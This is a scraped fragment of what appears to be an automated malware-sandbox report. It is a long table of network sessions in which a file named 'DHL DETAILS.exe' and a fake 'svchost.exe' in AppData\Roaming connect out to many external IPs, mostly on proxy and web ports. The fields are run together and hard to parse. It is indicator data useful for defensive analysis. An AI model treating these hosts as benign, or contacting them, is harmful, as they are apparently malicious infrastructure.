                                                                                    5935192.168.2.557210104.20.75.698043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5936192.168.2.556790150.109.243.1561567343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5937192.168.2.557228203.32.120.2028043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5938192.168.2.557235172.67.127.1888043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5939192.168.2.55748243.153.172.7644343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5940192.168.2.55749443.153.172.7644343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5941192.168.2.55750143.153.172.7644343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5942192.168.2.55752443.153.172.7644343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5943192.168.2.55711638.54.6.39908043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5944192.168.2.556949147.75.92.251940143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5945192.168.2.556878114.132.202.78808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5946192.168.2.557107184.170.249.65414543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5947192.168.2.556963211.222.252.187819743312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5948192.168.2.556987185.212.60.628043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5949192.168.2.556894160.16.90.35312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5950192.168.2.556936185.219.133.106312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5951192.168.2.55705051.20.50.149312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5952192.168.2.557398104.16.105.1468043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5953192.168.2.55688543.133.136.208880043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5954192.168.2.557308104.18.44.938043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5955192.168.2.55699265.109.152.88888843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5956192.168.2.55708918.133.16.218043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5957192.168.2.557384172.67.181.1038043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5958192.168.2.562533148.72.215.2304438756176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5959192.168.2.55711964.137.93.62651943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5960192.168.2.564734159.203.13.1218056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5961192.168.2.562537103.165.234.46808056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5962192.168.2.557423188.114.99.378043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5963192.168.2.557062103.83.232.1228043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5964192.168.2.55708293.90.212.2415343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5965192.168.2.55722037.187.77.582186143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5966192.168.2.55739234.135.203.172312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5967192.168.2.556336117.160.250.1638143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5968192.168.2.56466591.134.140.1603289643080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5969192.168.2.557168173.249.29.243912343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5970192.168.2.556889122.114.232.13780843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5971192.168.2.55703989.218.8.152108043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5972192.168.2.55695760.12.168.114900243312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5973192.168.2.557177113.208.119.142900243312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5974192.168.2.557255209.126.104.384075043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5975192.168.2.55078638.54.2.16831286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5976192.168.2.555016171.244.140.160537496352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5977192.168.2.55713143.155.170.351567343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5978192.168.2.55726845.196.151.59543243312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5979192.168.2.557189185.101.16.528043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5980192.168.2.55050242.193.58.9680806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5981192.168.2.55735213.40.239.130312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5982192.168.2.557511104.16.72.458043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5983192.168.2.557213103.118.46.177808043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5984192.168.2.557229119.23.148.1738043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5985192.168.2.55273467.201.59.7041456352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5986192.168.2.55740182.113.157.1223128043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5987192.168.2.5647884.236.183.37808056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5988192.168.2.557680172.67.150.1738043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5989192.168.2.557660162.159.242.2528043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5990192.168.2.557788104.21.64.2088043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5991192.168.2.557744172.67.182.1268043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5992192.168.2.557298161.97.74.1763000043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5993192.168.2.557287139.224.64.191808143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5994192.168.2.55731091.189.177.188312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5995192.168.2.5574021.15.62.12567843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5996192.168.2.55772738.162.3.74312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5997192.168.2.55735349.4.48.128888843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5998192.168.2.55526337.187.91.192278986352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5999192.168.2.557841104.25.135.1708043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6000192.168.2.55731565.1.244.2328043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6001192.168.2.557428190.103.177.1318043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6002192.168.2.557884209.97.150.167312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6003192.168.2.555269134.209.105.20931286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6004192.168.2.55525141.33.203.23419756352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6005192.168.2.55725142.49.148.167900143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6006192.168.2.55759447.243.92.199312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6007192.168.2.55750288.79.243.103312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6008192.168.2.557564123.57.246.163811843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6009192.168.2.557431195.87.217.75338943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6010192.168.2.557672147.75.34.868043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6011192.168.2.5577333.123.150.192312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6012192.168.2.557580201.13.147.161567843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6013192.168.2.554124153.139.233.21880806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6014192.168.2.551129183.88.46.3780806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6015192.168.2.557820185.49.30.5808143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6016192.168.2.55777891.189.177.186312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6017192.168.2.555546212.110.188.2203440943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6018192.168.2.557625178.128.113.1182312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6019192.168.2.557781120.26.0.11888043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6020192.168.2.557949104.27.83.1838043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6021192.168.2.55761160.205.132.718043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6022192.168.2.55782862.33.207.202312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6023192.168.2.55776852.172.1.1868043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6024192.168.2.557829178.54.21.203808143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6025192.168.2.557529222.138.76.6900243312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6026192.168.2.557699103.66.177.173225143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6027192.168.2.551219175.183.82.22181976352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6028192.168.2.557816103.190.54.1418043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6029192.168.2.555860167.99.124.1188043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6030192.168.2.557970104.21.124.1218043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6031192.168.2.55665574.119.144.60414543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6032192.168.2.557125111.53.178.249730243312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6033192.168.2.551593203.161.32.218506406352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6034192.168.2.564853132.148.245.1123811743080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6035192.168.2.557886103.190.54.141808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6036192.168.2.564958192.99.207.1294452343080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6037192.168.2.558046104.27.15.1618043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6038192.168.2.557962150.109.243.1561567343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6039192.168.2.557967211.222.252.187819743312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6040192.168.2.55606451.15.254.1291637943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6041192.168.2.550319103.97.179.11510806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6042192.168.2.56485812.186.205.1208056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6043192.168.2.556743199.102.106.94414543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6044192.168.2.557921139.129.202.2448043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6045192.168.2.56491262.171.169.375840243080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6046192.168.2.55136845.11.95.16660156352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6047192.168.2.557950185.38.111.1808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6048192.168.2.55793561.178.152.31730243312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6049192.168.2.557948115.74.157.191108043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6050192.168.2.55209127.65.114.810806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6051192.168.2.555679138.2.73.157108043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6052192.168.2.55799739.108.227.1088043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6053192.168.2.551607172.93.111.87432096352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6054192.168.2.55792972.49.49.113103443312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6055192.168.2.551567158.160.49.25531286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6056192.168.2.551317105.112.140.21880806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6057192.168.2.55645851.79.87.144853343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6058192.168.2.55807213.40.239.130312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6059192.168.2.556384219.71.216.788043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6060192.168.2.56483441.70.12.54567843080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6061192.168.2.55810520.210.113.32812343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6062192.168.2.55804745.117.179.1791479143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6063192.168.2.558069185.101.16.528043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6064192.168.2.55810980.169.243.234108043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6065192.168.2.551869143.110.232.177806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6066192.168.2.55809643.155.170.351567343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6067192.168.2.55807093.90.212.2415343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6068192.168.2.565194162.241.50.1793594856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6069192.168.2.558095103.118.46.177808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6070192.168.2.56498246.10.229.243777756176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6071192.168.2.564954203.202.253.108502043080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6072192.168.2.565008103.229.83.106678943080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6073192.168.2.56521766.228.33.1902956656176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6074192.168.2.55822197.74.233.2061674443312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
